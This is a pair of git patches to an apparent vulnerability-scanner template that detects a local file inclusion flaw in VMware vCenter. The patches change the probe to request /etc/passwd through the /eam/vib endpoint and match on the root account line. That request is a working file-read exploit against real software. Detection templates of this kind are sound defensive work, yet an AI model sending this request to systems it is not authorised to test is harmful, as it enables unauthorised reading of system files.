From 367a2434b31514f2422e42d456e48650364d40cc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 3 Mar 2023 00:33:52 +0530 Subject: [PATCH 1/2] Fix FP --- vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index c696caa5bc..9f5a527891 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -14,10 +14,10 @@ info: requests: - method: GET path: - - "{{BaseURL}}/eam/vib?id=/etc/issue" + - "{{BaseURL}}/eam/vib?id=/etc/passwd" matchers: - - type: word - words: - - "vCenter Server" + - type: regex + regex: + - "root:.*:0:0:" # Enhanced by mp on 2022/08/01 From 8b43d840f844db694b57edda751e760d2c650a95 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 3 Mar 2023 00:36:32 +0530 Subject: [PATCH 2/2] misc --- vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index 9f5a527891..ffdac8c205 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -9,15 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: vmware,lfi,vcenter + tags: vmware,lfi,vcenter,linux requests: - method: GET path: - "{{BaseURL}}/eam/vib?id=/etc/passwd" + matchers: - type: regex regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/08/01